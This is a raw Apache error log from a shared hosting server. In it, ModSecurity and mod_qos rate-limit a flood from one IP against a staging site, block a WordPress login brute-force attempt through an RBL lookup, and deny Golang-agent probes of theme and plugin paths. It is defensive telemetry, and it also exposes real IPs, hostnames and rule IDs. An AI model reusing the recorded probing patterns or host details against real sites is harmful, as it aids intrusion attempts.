[Tue May 26 20:00:15.380487 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1bBgAAAOw"]
[Tue May 26 20:00:15.383990 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1bBAAAAKM"]
[Tue May 26 20:00:15.385340 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1bCAAAAKE"]
[Tue May 26 20:00:15.403922 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1bCQAAAMs"]
[Tue May 26 20:00:15.424560 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bNQAAAOY"]
[Tue May 26 20:00:15.426148 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-awAAACI"]
[Tue May 26 20:00:15.437102 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-uAAAAAU"]
[Tue May 26 20:00:15.440185 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-vQAAAHY"]
[Tue May 26 20:00:15.450876 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-uwAAAG4"]
[Tue May 26 20:00:15.460822 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-wwAAABE"]
[Tue May 26 20:00:15.525708 2026] [security2:error] [pid 106517:tid 106776] [client 152.232.68.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bnQAAAQI"], referer: https://www.anujtradingco.com/
[Tue May 26 20:00:15.538149 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bvgAAAMs
[Tue May 26 20:00:15.539851 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWud2DRMqfxdEDkosz_NAAAACE
[Tue May 26 20:00:15.547720 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWud4ZZc2DoU1lPnP1bwAAAANI
[Tue May 26 20:00:15.560066 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bwwAAAMQ
[Tue May 26 20:00:15.577603 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_OQAAAFQ
[Tue May 26 20:00:15.581779 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_OgAAACo
[Tue May 26 20:00:15.593546 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_OwAAAD8
[Tue May 26 20:00:15.596280 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_PAAAAGU
[Tue May 26 20:00:15.598084 2026] [security2:error] [pid 93576:tid 93688] [remote 79.112.96.62:56920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.96.112.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWud2DRMqfxdEDkosz_MwAANmo"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 20:00:15.610557 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_PQAAACA
[Tue May 26 20:00:15.664475 2026] [security2:error] [pid 106517:tid 106663] [client 103.163.220.23:50111] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/"] [unique_id "ahWud4ZZc2DoU1lPnP1bxwAAAJI"]
[Tue May 26 20:00:15.687669 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bzQAAAJ8
[Tue May 26 20:00:15.695332 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_RQAAAH8
[Tue May 26 20:00:15.701455 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bzgAAAN4
[Tue May 26 20:00:15.712990 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1bzwAAAK8
[Tue May 26 20:00:15.733316 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_RwAAAEc
[Tue May 26 20:00:15.737336 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_SAAAAAc
[Tue May 26 20:00:15.745206 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_SQAAAEw
[Tue May 26 20:00:15.749653 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_SgAAAFA
[Tue May 26 20:00:15.761497 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_SwAAABg
[Tue May 26 20:00:15.837227 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1b1gAAAKY
[Tue May 26 20:00:15.845159 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_TgAAAAA
[Tue May 26 20:00:15.856188 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1b1wAAAOU
[Tue May 26 20:00:15.865109 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1b2AAAANI
[Tue May 26 20:00:15.885184 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_TwAAABU
[Tue May 26 20:00:15.891210 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_UAAAAH0
[Tue May 26 20:00:15.901115 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_UQAAAAU
[Tue May 26 20:00:15.903877 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_UgAAAHs
[Tue May 26 20:00:15.909231 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_UwAAAE4
[Tue May 26 20:00:15.911835 2026] [security2:error] [pid 106517:tid 106702] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1b1QAAALg"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1224898&moderation-hash=5bab754b47d74ed2554a03bd03e0a17e
[Tue May 26 20:00:15.923094 2026] [security2:error] [pid 93576:tid 93724] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWud2DRMqfxdEDkosz_IwAAAAw"]
[Tue May 26 20:00:15.934181 2026] [qos:error] [pid 106517:tid 106679] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1b2QAAAKE
[Tue May 26 20:00:15.987157 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud4ZZc2DoU1lPnP1b3QAAAJ4
[Tue May 26 20:00:15.994763 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWud2DRMqfxdEDkosz_VgAAAG0
[Tue May 26 20:00:16.008796 2026] [qos:error] [pid 106517:tid 106768] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b3gAAAPo
[Tue May 26 20:00:16.017110 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b3wAAAOo
[Tue May 26 20:00:16.037566 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_WAAAAGg
[Tue May 26 20:00:16.045308 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_WQAAAHQ
[Tue May 26 20:00:16.052993 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_WgAAAAI
[Tue May 26 20:00:16.056509 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_WwAAAGM
[Tue May 26 20:00:16.058021 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_XAAAACE
[Tue May 26 20:00:16.088512 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b4wAAAKg
[Tue May 26 20:00:16.169321 2026] [security2:error] [pid 93576:tid 93775] [client 103.163.220.11:38549] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahWueGDRMqfxdEDkosz_XgAAAD8"]
[Tue May 26 20:00:16.203667 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_YgAAADI
[Tue May 26 20:00:16.204286 2026] [qos:error] [pid 106517:tid 106681] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b5gAAAKM
[Tue May 26 20:00:16.207155 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_YwAAABM
[Tue May 26 20:00:16.211484 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_ZAAAAH4
[Tue May 26 20:00:16.212867 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b5wAAANs
[Tue May 26 20:00:16.214057 2026] [qos:error] [pid 106517:tid 106694] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b6AAAALA
[Tue May 26 20:00:16.216887 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_ZQAAAEE
[Tue May 26 20:00:16.217558 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueGDRMqfxdEDkosz_ZgAAAEE
[Tue May 26 20:00:16.242532 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueIZZc2DoU1lPnP1b6gAAAKY
[Tue May 26 20:00:16.277511 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-sQAAADg"]
[Tue May 26 20:00:16.291637 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-wgAAADc"]
[Tue May 26 20:00:16.293482 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bOAAAAOM"]
[Tue May 26 20:00:16.295621 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bLwAAAN8"]
[Tue May 26 20:00:16.300653 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-zAAAAB8"]
[Tue May 26 20:00:16.301637 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-xQAAAB0"]
[Tue May 26 20:00:16.301985 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bMQAAAOA"]
[Tue May 26 20:00:16.304745 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bQAAAAMk"]
[Tue May 26 20:00:16.307561 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-zwAAABY"]
[Tue May 26 20:00:16.308611 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bOQAAAM0"]
[Tue May 26 20:00:16.312813 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-0wAAACY"]
[Tue May 26 20:00:16.321050 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-zgAAAAY"]
[Tue May 26 20:00:16.331197 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bMwAAANY"]
[Tue May 26 20:00:16.336347 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-0gAAAE8"]
[Tue May 26 20:00:16.337651 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bhAAAAIw"]
[Tue May 26 20:00:16.343668 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1biwAAANg"]
[Tue May 26 20:00:16.344312 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bSgAAAKA"]
[Tue May 26 20:00:16.346335 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bUAAAAIU"]
[Tue May 26 20:00:16.350057 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bUQAAAJM"]
[Tue May 26 20:00:16.360744 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bTQAAALc"]
[Tue May 26 20:00:16.362605 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bTwAAAIs"]
[Tue May 26 20:00:16.385446 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bjgAAAKw"]
[Tue May 26 20:00:16.387530 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudmDRMqfxdEDkosz-0AAAAF8"]
[Tue May 26 20:00:16.396949 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudoZZc2DoU1lPnP1bSQAAAJs"]
[Tue May 26 20:00:16.399640 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWud4ZZc2DoU1lPnP1bjwAAAKI"]
